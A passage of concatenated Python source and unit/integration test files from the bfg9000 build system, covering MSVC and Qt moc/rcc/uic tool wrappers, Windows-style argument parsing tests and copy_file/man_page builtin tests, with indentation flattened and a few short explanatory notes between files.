self, env, command=(ar_name,) + lib_which,
flags=(arflags_name, arflags)
),
}
self.packages = MsvcPackageResolver(self, env)
self.runner = None
@staticmethod
def _parse_brand(env, command, version_output):
if 'Microsoft (R)' in version_output:
return 'msvc', detect_version(version_output)
elif 'clang LLVM compiler' in version_output:
real_version = env.execute(
command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.stdout
)
return 'clang', detect_version(real_version)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['-?'], stdout=shell.Mode.pipe,
stderr=shell.Mode.stdout)
@property
def flavor(self):
return 'msvc'
@property
def family(self):
return 'native'
@property
def auto_link(self):
return True
@property
def can_dual_link(self):
return False
def linker(self, mode):
return self._linkers[mode]
class MsvcPackageResolver:
_lib_names = ['{}.lib']
def __init__(self, builder, env):
self.builder = builder
self.env = env
self.include_dirs = [i for i in uniques(chain(
self.builder.compiler.search_dirs(),
self.env.host_platform.include_dirs
)) if exists(i)]
self.lib_dirs = [i for i in uniques(chain(
self.builder.linker('executable').search_dirs(),
self.env.host_platform.lib_dirs
)) if exists(i)]
@property
def lang(self):
return self.builder.lang
# TODO: Remove headers/libs from arguments after 0.7 is released.
def resolve(self, name, submodules, version, kind, *, headers=None,
libs=None, system=True):
format = self.builder.object_format
usage = mopack.get_usage(self.env, name, submodules, self.include_dirs,
self.lib_dirs, self._lib_names)
# XXX: Add headers/libs here somehow? Add them into PkgConfigPackage
# directly?
return pkg_config.resolve(
self.env, name, submodules, version, usage['pcfiles'],
format=format, kind=kind, system=system, search_path=usage['path'],
extra_options=usage.get('extra_args', []),
generated=usage.get('generated', False)
)
```
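One detail worth noting in `MsvcBuilder.__init__` above: the default locations of `link` and `lib` are taken from the directory of whichever element of the compiler command has a basename of `cl`/`cl.exe`. A hypothetical illustration of that lookup (not the project's API):

```python
import os.path

def find_origin(command):
    """Directory of the command element whose basename looks like cl."""
    origin = ''
    for i in reversed(command):
        if os.path.basename(i) in ('cl', 'cl.exe'):
            origin = os.path.dirname(i)
    return origin

assert find_origin(['C:/VC/bin/cl.exe', '/nologo']) == 'C:/VC/bin'
assert find_origin(['gcc']) == ''
```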
#### File: bfg9000/tools/qt.py
```python
from itertools import chain
from . import builder
from .. import options as opts, safe_str, shell
from .common import Builder, choose_builder, SimpleBuildCommand
from ..file_types import HeaderFile, SourceFile
from ..iterutils import iterate
from ..languages import known_langs
from ..path import Path
from ..versioning import detect_version
# Set the source language to C++, since we want to be able to use the C++
# language definition to infer whether a file passed to `moc` is a source or
# header file based on its extension.
with known_langs.make('qtmoc', src_lang='c++') as x:
x.vars(compiler='MOC', flags='MOCFLAGS')
with known_langs.make('qrc') as x:
x.vars(compiler='RCC', flags='RCCFLAGS')
x.exts(source=['.qrc'])
with known_langs.make('qtui') as x:
x.vars(compiler='UIC', flags='UICFLAGS')
x.exts(source=['.ui'])
@builder('qtmoc')
def moc_builder(env):
return choose_builder(env, known_langs['qtmoc'], (MocBuilder,),
default_candidates=['moc'])
class MocBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
mocflags_name = langinfo.var('flags').lower()
mocflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = MocCompiler(
self, env, command=(name, command, found),
flags=(mocflags_name, mocflags)
)
@staticmethod
def _parse_brand(version_output):
if 'moc' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class MocCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return None
def _call(self, cmd, input, output, flags=None):
return list(chain(
cmd, iterate(flags), [input, '-o', output]
))
def default_name(self, input, step):
if isinstance(input, SourceFile):
return input.path.stripext('.moc').suffix
base, leaf = input.path.stripext(
known_langs['c++'].default_ext('source')
).splitleaf()
return base.append('moc_' + leaf).suffix
def output_file(self, name, step):
return SourceFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, opts.include_dir):
flags.append('-I' + i.directory.path)
elif isinstance(i, opts.define):
if i.value:
flags.append('-D' + i.name + '=' + i.value)
else:
flags.append('-D' + i.name)
elif isinstance(i, opts.warning):
for j in i.value:
if j == opts.WarningValue.disable:
flags.append('--no-warnings')
else:
raise ValueError('unsupported warning level {!r}'
.format(j))
elif isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
@builder('qrc')
def qrc_builder(env):
return choose_builder(env, known_langs['qrc'], (RccBuilder,),
default_candidates=['rcc'])
class RccBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
rccflags_name = langinfo.var('flags').lower()
rccflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = RccCompiler(
self, env, command=(name, command, found),
flags=(rccflags_name, rccflags)
)
@staticmethod
def _parse_brand(version_output):
if 'rcc' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class RccCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return 'gcc'
def _call(self, cmd, input, output, deps=None, flags=None):
result = list(chain(cmd, iterate(flags), [input, '-o', output]))
if deps:
return self.env.tool('rccdep')(result, deps)
return result
def default_name(self, input, step):
return input.path.stripext(
known_langs['c++'].default_ext('source')
).suffix
def output_file(self, name, step):
return SourceFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
@builder('qtui')
def qtui_builder(env):
return choose_builder(env, known_langs['qtui'], (UicBuilder,),
default_candidates=['uic'])
class UicBuilder(Builder):
def __init__(self, env, langinfo, command, found, version_output):
super().__init__(langinfo.name, *self._parse_brand(version_output))
name = langinfo.var('compiler').lower()
uicflags_name = langinfo.var('flags').lower()
uicflags = shell.split(env.getvar(langinfo.var('flags'), ''))
self.transpiler = UicCompiler(
self, env, command=(name, command, found),
flags=(uicflags_name, uicflags)
)
@staticmethod
def _parse_brand(version_output):
if 'uic' in version_output:
return 'qt', detect_version(version_output)
return 'unknown', None
@staticmethod
def check_command(env, command):
return env.execute(command + ['--version'], stdout=shell.Mode.pipe,
stderr=shell.Mode.devnull)
class UicCompiler(SimpleBuildCommand):
@property
def deps_flavor(self):
return None
def _call(self, cmd, input, output, flags=None):
return list(chain(
cmd, iterate(flags), [input, '-o', output]
))
def default_name(self, input, step):
base, leaf = input.path.stripext('.h').splitleaf()
return base.append('ui_' + leaf).suffix
def output_file(self, name, step):
return HeaderFile(Path(name), 'c++')
def flags(self, options, global_options=None, output=None, mode='normal'):
flags = []
for i in options:
if isinstance(i, safe_str.stringy_types):
flags.append(i)
else:
raise TypeError('unknown option type {!r}'.format(type(i)))
return flags
```
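The `default_name` methods above encode Qt's usual naming conventions for generated files: running `moc` on a C++ source yields a `.moc` include alongside it, while running it on a header yields a `moc_<name>.cpp` source; `uic` similarly produces `ui_<name>.h`. A rough sketch of the moc convention with plain string handling (the project uses its own `Path` type, so this helper is illustrative only):

```python
def moc_default_name(path, is_source):
    """foo.cpp -> foo.moc; foo.hpp -> moc_foo.cpp (same directory)."""
    base, _, leaf = path.rpartition('/')
    stem = leaf.rsplit('.', 1)[0]
    prefix = base + '/' if base else ''
    if is_source:
        return prefix + stem + '.moc'
    return prefix + 'moc_' + stem + '.cpp'

assert moc_default_name('widgets/foo.cpp', is_source=True) == 'widgets/foo.moc'
assert moc_default_name('widgets/foo.hpp', is_source=False) == 'widgets/moc_foo.cpp'
```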
#### File: jimporter/bfg9000/mkdocs.py
```python
from verspec.python import Version
from bfg9000.app_version import version as version_str
def define_env(env):
version = Version(version_str)
tree = 'master' if version.is_prerelease else 'v{}'.format(version)
repo_src_url = '{}tree/{}/'.format(env.conf['repo_url'], tree)
env.variables.repo_src_url = repo_src_url
```
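The mkdocs hook above maps the package version to the git tree that documentation links should point at. A small sketch of that mapping; it uses `packaging.version` here purely for illustration (the project itself uses verspec):

```python
from packaging.version import Version

def doc_tree(version_str):
    """Prereleases link to master; releases link to their version tag."""
    version = Version(version_str)
    return 'master' if version.is_prerelease else 'v{}'.format(version)

assert doc_tree('0.7.0.dev0') == 'master'
assert doc_tree('0.6.0') == 'v0.6.0'
```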
#### File: test/integration/test_executable.py
```python
import tarfile
from os.path import join as pjoin
from . import *
class TestExecutable(IntegrationTest):
def __init__(self, *args, **kwargs):
super().__init__(os.path.join(examples_dir, '01_executable'),
*args, **kwargs)
def test_build(self):
self.build(executable('simple'))
self.assertOutput([executable('simple')], 'hello, world!\n')
@skip_if_backend('msbuild')
def test_all(self):
self.build('all')
self.assertOutput([executable('simple')], 'hello, world!\n')
def test_default_and_clean(self):
def target_path(p, prefix=''):
return self.target_path(output_file(p), prefix)
self.build()
self.assertOutput([executable('simple')], 'hello, world!\n')
self.clean()
common = {'.bfg_environ', 'compile_commands.json'}
files = {
'ninja': [common | {'.ninja_deps', '.ninja_log', 'build.ninja'}],
'make': [common | {'Makefile', pjoin('simple.int', '.dir')}],
'msbuild': [common | {
'.bfg_uuid', 'simple.sln', pjoin('simple', 'simple.vcxproj'),
target_path('simple.Build.CppClean.log', prefix='simple'),
}, {
target_path('simple.exe.recipe', prefix='simple'),
target_path('simple.vcxproj.FileListAbsolute.txt',
prefix='simple'),
}],
}
self.assertDirectory('.', *files[self.backend])
@skip_if_backend('msbuild')
def test_dist(self):
dist = output_file('simple-1.0.tar.gz')
self.build('dist')
self.assertExists(dist)
with tarfile.open(self.target_path(dist)) as t:
self.assertEqual(set(t.getnames()), {
'simple-1.0/build.bfg',
'simple-1.0/simple.cpp',
})
```
#### File: test/integration/test_mopack.py
```python
import os
from . import *
@skip_if_backend('msbuild')
class TestMopack(IntegrationTest):
def __init__(self, *args, **kwargs):
super().__init__(os.path.join(examples_dir, '07_mopack'),
configure=False, install=True, *args, **kwargs)
def _test_build_install(self, to='world', extra_args=[]):
self.configure(extra_args=extra_args)
self.build()
env_vars = None
if env.target_platform.family == 'windows':
env_vars = {'PATH': os.path.abspath(
self.target_path(output_file('mopack/build/hello'))
) + os.pathsep + os.environ['PATH']}
self.assertOutput([executable('prog')], 'hello, {}!\n'.format(to),
extra_env=env_vars)
self.build('install')
os.chdir(self.srcdir)
cleandir(self.builddir)
extra = []
if env.target_platform.has_import_library:
extra = [os.path.join(self.libdir, import_library('hello').path)]
self.assertDirectory(self.installdir, [
os.path.join(self.includedir, 'hello.hpp'),
os.path.join(self.libdir, shared_library('hello').path),
os.path.join(self.libdir, 'pkgconfig', 'hello.pc'),
os.path.join(self.bindir, executable('prog').path),
] + extra)
self.assertOutput(
[os.path.join(self.bindir, executable('prog').path)],
'hello, {}!\n'.format(to)
)
def test_build_install_default(self):
self._test_build_install()
def test_build_install_mopack_override(self):
mopack_override = os.path.join(test_data_dir, 'mopack-override.yml')
self._test_build_install('bob', ['-p', mopack_override])
@skip_if('mingw-cross' not in test_features, 'skipping mingw cross test')
def test_mingw_windows(self):
self.configure(extra_args=['--toolchain', os.path.join(
test_data_dir, 'mingw-windows-toolchain.bfg'
)])
self.build()
output = self.assertPopen(['file', '-b', 'prog.exe'])
self.assertRegex(output, r"PE32")
```
#### File: unit/arguments/test_windows.py
```python
from .. import *
from bfg9000.arguments.windows import *
class TestWindowsArgParse(TestCase):
def test_empty(self):
parser = ArgumentParser()
self.assertEqual(parser.parse_known([]), ({}, []))
self.assertEqual(parser.parse_known(['extra']), ({}, ['extra']))
self.assertEqual(parser.parse_known(['/extra']), ({}, ['/extra']))
def test_short_bool(self):
parser = ArgumentParser()
parser.add('/a')
self.assertEqual(parser.parse_known([]), ({'a': None}, []))
self.assertEqual(parser.parse_known(['/a']), ({'a': True}, []))
self.assertEqual(parser.parse_known(['/a', '/a']), ({'a': True}, []))
parser = ArgumentParser()
parser.add('/a', '-a')
self.assertEqual(parser.parse_known([]), ({'a': None}, []))
self.assertEqual(parser.parse_known(['/a']), ({'a': True}, []))
self.assertEqual(parser.parse_known(['-a']), ({'a': True}, []))
def test_long_bool(self):
parser = ArgumentParser()
parser.add('/foo')
self.assertEqual(parser.parse_known([]), ({'foo': None}, []))
self.assertEqual(parser.parse_known(['/foo']), ({'foo': True}, []))
self.assertEqual(parser.parse_known(['/foo', '/foo']),
({'foo': True}, []))
parser = ArgumentParser()
parser.add('/foo', '-foo')
self.assertEqual(parser.parse_known([]), ({'foo': None}, []))
self.assertEqual(parser.parse_known(['/foo']), ({'foo': True}, []))
self.assertEqual(parser.parse_known(['-foo']), ({'foo': True}, []))
def test_short_str(self):
parser = ArgumentParser()
parser.add('/a', type=str)
self.assertEqual(parser.parse_known([]), ({'a': None}, []))
self.assertEqual(parser.parse_known(['/afoo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['/a', 'foo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['/afoo', '/a', 'bar']),
({'a': 'bar'}, []))
parser = ArgumentParser()
parser.add('/a', '-a', type=str)
self.assertEqual(parser.parse_known([]), ({'a': None}, []))
self.assertEqual(parser.parse_known(['/afoo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['-afoo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['/a', 'foo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['-a', 'foo']), ({'a': 'foo'}, []))
self.assertEqual(parser.parse_known(['/afoo', '-a', 'bar']),
({'a': 'bar'}, []))
def test_long_str(self):
parser = ArgumentParser()
parser.add('/foo', type=str)
self.assertEqual(parser.parse_known([]), ({'foo': None}, []))
self.assertEqual(parser.parse_known(['/foo:bar']),
({'foo': 'bar'}, []))
self.assertEqual(parser.parse_known(['/foo:bar', '/foo:baz']),
({'foo': 'baz'}, []))
parser = ArgumentParser()
parser.add('/foo', '-foo', type=str)
self.assertEqual(parser.parse_known([]), ({'foo': None}, []))
self.assertEqual(parser.parse_known(['/foo:bar']),
({'foo': 'bar'}, []))
self.assertEqual(parser.parse_known(['-foo:bar']),
({'foo': 'bar'}, []))
self.assertEqual(parser.parse_known(['/foo:bar', '-foo:baz']),
({'foo': 'baz'}, []))
def test_short_list(self):
parser = ArgumentParser()
parser.add('/a', type=list)
self.assertEqual(parser.parse_known([]), ({'a': []}, []))
self.assertEqual(parser.parse_known(['/afoo']), ({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['/a', 'foo']),
({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['/afoo', '/a', 'bar']),
({'a': ['foo', 'bar']}, []))
parser = ArgumentParser()
parser.add('/a', '-a', type=list)
self.assertEqual(parser.parse_known([]), ({'a': []}, []))
self.assertEqual(parser.parse_known(['/afoo']), ({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['-afoo']), ({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['/a', 'foo']),
({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['-a', 'foo']),
({'a': ['foo']}, []))
self.assertEqual(parser.parse_known(['/afoo', '-a', 'bar']),
({'a': ['foo', 'bar']}, []))
def test_long_list(self):
parser = ArgumentParser()
parser.add('/foo', type=list)
self.assertEqual(parser.parse_known([]), ({'foo': []}, []))
self.assertEqual(parser.parse_known(['/foo:bar']),
({'foo': ['bar']}, []))
self.assertEqual(parser.parse_known(['/foo:bar', '/foo:baz']),
({'foo': ['bar', 'baz']}, []))
parser = ArgumentParser()
parser.add('/foo', '-foo', type=list)
self.assertEqual(parser.parse_known([]), ({'foo': []}, []))
self.assertEqual(parser.parse_known(['/foo:bar']),
({'foo': ['bar']}, []))
self.assertEqual(parser.parse_known(['-foo:bar']),
({'foo': ['bar']}, []))
self.assertEqual(parser.parse_known(['/foo:bar', '-foo:baz']),
({'foo': ['bar', 'baz']}, []))
def test_short_dict(self):
parser = ArgumentParser()
warn = parser.add('/W', type=dict, dest='warn')
warn.add('1', '2', '3', '4', 'all', dest='level')
warn.add('X', type=bool, dest='error')
warn.add('X-', type=bool, dest='error', value=False)
warn.add('v', type=str, dest='version')
self.assertEqual(parser.parse_known([]), ({
'warn': {'level': None, 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/W2']), ({
'warn': {'level': '2', 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/W2', '/W4']), ({
'warn': {'level': '4', 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/W2', '/WX']), ({
'warn': {'level': '2', 'error': True, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Wv17']), ({
'warn': {'level': None, 'error': None, 'version': '17'}
}, []))
self.assertEqual(parser.parse_known(['/Wfoo']), ({
'warn': {'level': None, 'error': None, 'version': None}
}, ['/Wfoo']))
self.assertEqual(parser.parse_known(
['/WX', '/W2', '/WX-', '/Wall', '/Wv17', '/Wfoo']
), ({'warn': {'level': 'all', 'error': False, 'version': '17'}},
['/Wfoo']))
def test_long_dict(self):
parser = ArgumentParser()
warn = parser.add('/Warn', type=dict, dest='warn')
warn.add('1', '2', '3', '4', 'all', dest='level')
warn.add('X', type=bool, dest='error')
warn.add('X-', type=bool, dest='error', value=False)
warn.add('v', type=str, dest='version')
self.assertEqual(parser.parse_known([]), ({
'warn': {'level': None, 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Warn:2']), ({
'warn': {'level': '2', 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Warn:2', '/Warn:4']), ({
'warn': {'level': '4', 'error': None, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Warn:2', '/Warn:X']), ({
'warn': {'level': '2', 'error': True, 'version': None}
}, []))
self.assertEqual(parser.parse_known(['/Warn:v17']), ({
'warn': {'level': None, 'error': None, 'version': '17'}
}, []))
self.assertEqual(parser.parse_known(['/Warn:foo']), ({
'warn': {'level': None, 'error': None, 'version': None}
}, ['/Warn:foo']))
self.assertEqual(parser.parse_known(
['/Warn:X', '/Warn:2', '/Warn:X-', '/Warn:all', '/Warn:v17',
'/Warn:foo']
), ({'warn': {'level': 'all', 'error': False, 'version': '17'}},
['/Warn:foo']))
def test_alias(self):
parser = ArgumentParser()
nologo = parser.add('/nologo')
warn = parser.add('/W', type=dict, dest='warn')
warn.add('0', '1', '2', '3', '4', 'all', dest='level')
parser.add('/N', type='alias', base=nologo)
parser.add('/w', type='alias', base=warn, value='0')
self.assertEqual(parser.parse_known([]),
({'nologo': None, 'warn': {'level': None}}, []))
self.assertEqual(parser.parse_known(['/N']),
({'nologo': True, 'warn': {'level': None}}, []))
self.assertEqual(parser.parse_known(['/w']),
({'nologo': None, 'warn': {'level': '0'}}, []))
def test_unnamed(self):
parser = ArgumentParser()
parser.add('/a')
parser.add_unnamed('libs')
self.assertEqual(parser.parse_known([]),
({'a': None, 'libs': []}, []))
self.assertEqual(parser.parse_known(['foo']),
({'a': None, 'libs': ['foo']}, []))
self.assertEqual(parser.parse_known(['foo', '/a', 'bar']),
({'a': True, 'libs': ['foo', 'bar']}, []))
def test_case(self):
parser = ArgumentParser()
parser.add('/s')
parser.add('/long')
self.assertEqual(parser.parse_known(['/s', '/long']),
({'s': True, 'long': True}, []))
self.assertEqual(parser.parse_known(['/S', '/LONG']),
({'s': None, 'long': None}, ['/S', '/LONG']))
parser = ArgumentParser(case_sensitive=False)
parser.add('/s')
parser.add('/long')
self.assertEqual(parser.parse_known(['/s', '/long']),
({'s': True, 'long': True}, []))
self.assertEqual(parser.parse_known(['/S', '/LONG']),
({'s': None, 'long': True}, ['/S']))
def test_collision(self):
parser = ArgumentParser()
parser.add('/a', '/longa')
with self.assertRaises(ValueError):
parser.add('/a')
with self.assertRaises(ValueError):
parser.add('/abc')
with self.assertRaises(ValueError):
parser.add('/longa')
def test_invalid_prefix_char(self):
parser = ArgumentParser()
with self.assertRaises(ValueError):
parser.add('warn')
def test_unexpected_value(self):
parser = ArgumentParser()
parser.add('/a', '/longa')
with self.assertRaises(ValueError):
parser.parse_known(['/afoo'])
with self.assertRaises(ValueError):
parser.parse_known(['/longa:foo'])
def test_expected_value(self):
parser = ArgumentParser()
parser.add('/a', '/longa', type=str)
parser.add('/list', type=list)
warn = parser.add('/warn', type=dict, dest='warn')
warn.add('1', '2', '3', '4', 'all', dest='level')
with self.assertRaises(ValueError):
parser.parse_known(['/a'])
with self.assertRaises(ValueError):
parser.parse_known(['/longa'])
with self.assertRaises(ValueError):
parser.parse_known(['/list'])
with self.assertRaises(ValueError):
parser.parse_known(['/warn'])
def test_invalid_dict_child(self):
parser = ArgumentParser()
warn = parser.add('/W', type=dict, dest='warn')
with self.assertRaises(ValueError):
warn.add('version', type=str)
def test_unexpected_dict_value(self):
parser = ArgumentParser()
warn = parser.add('/W', type=dict, dest='warn', strict=True)
warn.add('1', '2', '3', '4', 'all', dest='level')
with self.assertRaises(ValueError):
parser.parse_known(['/WX'])
def test_invalid_alias_base(self):
parser = ArgumentParser()
warn = parser.add('/W')
with self.assertRaises(TypeError):
parser.add('/w', type='alias', base=warn, value='0')
```
#### File: unit/builtins/common.py
```python
from .. import AttrDict, make_env, TestCase # noqa
from bfg9000 import file_types
from bfg9000.builtins import builtin
from bfg9000.build_inputs import BuildInputs
from bfg9000.path import Path, Root
class AlwaysEqual:
def __eq__(self, rhs):
return True
class FileTest(TestCase):
def assertSameFile(self, a, b, exclude=set(), seen=None):
if seen is None:
seen = set()
seen.add(id(a))
self.assertEqual(type(a), type(b))
keys = ((set(a.__dict__.keys()) | set(b.__dict__.keys())) -
exclude - {'creator', 'post_install'})
for i in keys:
ai, bi = getattr(a, i, None), getattr(b, i, None)
if ( isinstance(ai, file_types.Node) and
isinstance(bi, file_types.Node) ):
if not id(ai) in seen:
self.assertSameFile(ai, bi, exclude, seen)
else:
self.assertEqual(
ai, bi, '{!r}: {!r} != {!r}'.format(i, ai, bi)
)
class BuiltinTest(FileTest):
clear_variables = False
def setUp(self):
self.env = make_env()
self.build, self.context = self._make_context(self.env)
self.bfgfile = file_types.File(self.build.bfgpath)
def _make_context(self, env):
build = BuildInputs(env, Path('build.bfg', Root.srcdir))
context = builtin.BuildContext(env, build, None)
context.path_stack.append(
builtin.BuildContext.PathEntry(build.bfgpath)
)
return build, context
```
#### File: unit/builtins/test_copy_file.py
```python
from unittest import mock
from .common import AlwaysEqual, BuiltinTest
from bfg9000 import file_types
from bfg9000.builtins import copy_file as _copy_file # noqa
from bfg9000.path import Path, Root
class TestCopyFile(BuiltinTest):
def test_make_simple(self):
expected = file_types.File(Path('file.txt'))
result = self.context['copy_file'](file='file.txt')
self.assertSameFile(result, expected)
result = self.context['copy_file']('file.txt', 'src.txt')
self.assertSameFile(result, expected)
result = self.context['copy_file']('file.txt')
self.assertSameFile(result, expected)
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](src)
self.assertSameFile(result, expected)
def test_make_no_name_or_file(self):
self.assertRaises(TypeError, self.context['copy_file'])
def test_make_directory(self):
expected = file_types.File(Path('dir/file.txt'))
copy_file = self.context['copy_file']
result = copy_file('file.txt', directory='dir')
self.assertSameFile(result, expected)
src = self.context['generic_file']('file.txt')
result = copy_file(src, directory='dir')
self.assertSameFile(result, expected)
result = copy_file('file.txt', directory='dir/')
self.assertSameFile(result, expected)
result = copy_file('file.txt', directory=Path('dir'))
self.assertSameFile(result, expected)
result = copy_file('dir1/file.txt', directory='dir2')
self.assertSameFile(result,
file_types.File(Path('dir2/dir1/file.txt')))
result = copy_file('copied.txt', 'file.txt', directory='dir')
self.assertSameFile(result, file_types.File(Path('copied.txt')))
self.assertRaises(ValueError, copy_file, file='file.txt',
directory=Path('dir', Root.srcdir))
def test_make_submodule(self):
with self.context.push_path(Path('dir/build.bfg', Root.srcdir)):
copy_file = self.context['copy_file']
File = file_types.File
result = copy_file(file='file.txt')
self.assertSameFile(result, File(Path('dir/file.txt')))
result = copy_file(file='sub/file.txt')
self.assertSameFile(result, File(Path('dir/sub/file.txt')))
result = copy_file(file='../file.txt')
self.assertSameFile(result, File(Path('file.txt')))
result = copy_file('copied.txt', 'file.txt')
self.assertSameFile(result, File(Path('dir/copied.txt')))
result = copy_file('../copied.txt', 'file.txt')
self.assertSameFile(result, File(Path('copied.txt')))
result = copy_file(file='file.txt', directory='sub')
self.assertSameFile(result, File(Path('dir/sub/file.txt')))
result = copy_file(file='foo/file.txt', directory='sub')
self.assertSameFile(result, File(Path('dir/sub/foo/file.txt')))
result = copy_file(file='../file.txt', directory='sub')
self.assertSameFile(result, File(Path('dir/sub/PAR/file.txt')))
result = copy_file(file='file.txt', directory=Path('dir2'))
self.assertSameFile(result, File(Path('dir2/dir/file.txt')))
result = copy_file(file='sub/file.txt', directory=Path('dir2'))
self.assertSameFile(result, File(Path('dir2/dir/sub/file.txt')))
result = copy_file(file='../file.txt', directory=Path('dir2'))
self.assertSameFile(result, File(Path('dir2/file.txt')))
result = copy_file(file='file.txt', directory=Path('dir'))
self.assertSameFile(result, File(Path('dir/dir/file.txt')))
result = copy_file(file='sub/file.txt', directory=Path('dir'))
self.assertSameFile(result, File(Path('dir/dir/sub/file.txt')))
result = copy_file(file='../file.txt', directory=Path('dir'))
self.assertSameFile(result, File(Path('dir/file.txt')))
def test_extra_deps(self):
dep = self.context['generic_file']('dep.txt')
expected = file_types.File(Path('file.txt'))
result = self.context['copy_file'](file='file.txt', extra_deps=[dep])
self.assertSameFile(result, expected)
self.assertEqual(result.creator.extra_deps, [dep])
def test_invalid_mode(self):
self.assertRaises(ValueError, self.context['copy_file'],
file='file.txt', mode='unknown')
def test_description(self):
result = self.context['copy_file'](
file='file.txt', description='my description'
)
self.assertEqual(result.creator.description, 'my description')
class TestCopyFiles(BuiltinTest):
def make_file_list(self, prefix=''):
files = [file_types.File(Path(i, Root.builddir))
for i in [prefix + 'file1', prefix + 'file2']]
src_files = [file_types.File(Path(i, Root.srcdir))
for i in [prefix + 'file1', prefix + 'file2']]
file_list = self.context['copy_files'](src_files)
return file_list, files, src_files
def test_initialize(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(list(file_list), files)
def test_getitem_index(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(file_list[0], files[0])
def test_getitem_string(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(file_list['file1'], files[0])
def test_getitem_string_submodule(self):
file_list, files, src_files = self.make_file_list('dir/')
self.assertEqual(file_list['dir/file1'], files[0])
with self.context.push_path(Path('dir/build.bfg', Root.srcdir)):
self.assertEqual(file_list['file1'], files[0])
def test_getitem_path(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(file_list[src_files[0].path], files[0])
def test_getitem_file(self):
file_list, files, src_files = self.make_file_list()
self.assertEqual(file_list[src_files[0]], files[0])
def test_getitem_not_found(self):
file_list, files, src_files = self.make_file_list()
self.assertRaises(IndexError, lambda: file_list[2])
self.assertRaises(IndexError, lambda: file_list['file3'])
self.assertRaises(IndexError, lambda: file_list[Path(
'file3', Root.srcdir
)])
class TestManPage(BuiltinTest):
def test_identity(self):
expected = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
self.assertIs(self.context['man_page'](expected, compress=False),
expected)
def test_compress(self):
expected = file_types.ManPage(Path('myprogram.1.gz'), '1')
result = self.context['man_page']('myprogram.1', compress=True)
self.assertSameFile(result, expected)
man_page = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
result = self.context['man_page'](man_page, compress=True)
self.assertSameFile(result, expected)
expected = file_types.ManPage(Path('myprogram.1s.gz'), '1')
result = self.context['man_page']('myprogram.1s', compress=True)
self.assertSameFile(result, expected)
expected = file_types.ManPage(Path('myprogram.1.gz'), '2')
result = self.context['man_page']('myprogram.1', level='2',
compress=True)
self.assertSameFile(result, expected)
def test_no_compress(self):
expected = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
result = self.context['man_page']('myprogram.1', compress=False)
self.assertSameFile(result, expected)
expected = file_types.ManPage(Path('myprogram.1s', Root.srcdir), '1')
result = self.context['man_page']('myprogram.1s', compress=False)
self.assertSameFile(result, expected)
expected = file_types.ManPage(Path('myprogram.1', Root.srcdir), '2')
result = self.context['man_page']('myprogram.1', level='2',
compress=False)
self.assertSameFile(result, expected)
def test_auto_compress_enabled(self):
with mock.patch('bfg9000.shell.which', return_value=['command']):
self.env.tool('gzip')
expected = file_types.ManPage(Path('myprogram.1.gz'), '1')
result = self.context['man_page']('myprogram.1')
self.assertSameFile(result, expected)
def test_auto_compress_disabled(self):
with mock.patch('bfg9000.shell.which', side_effect=OSError('bad')), \
mock.patch('warnings.warn'):
self.env.tool('gzip')
expected = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
result = self.context['man_page']('myprogram.1')
self.assertSameFile(result, expected)
def test_invalid(self):
with self.assertRaises(ValueError):
self.context['man_page']('myprogram.foo')
man_page = file_types.ManPage(Path('myprogram.1', Root.srcdir), '1')
with self.assertRaises(TypeError):
self.context['man_page'](man_page, level='2')
class TestMakeBackend(BuiltinTest):
def test_simple(self):
makefile = mock.Mock()
src = self.context['generic_file']('file.txt')
result = self.context['copy_file'](file=src)
_copy_file.make_copy_file(result.creator, self.build, makefile,
self.env)
makefile.rule.assert_called_once_with(
target=[result], deps=[src], order_only=[], recipe=AlwaysEqual()
)
def test_dir_sentinel(self):
makefile = mock.Mock()
src = self.context['generic_file']('dir/file.txt')
result = self.context['copy_file'](file=src)
_copy_file.make_copy_file(result.creator, self.build, makefile,
self.env)
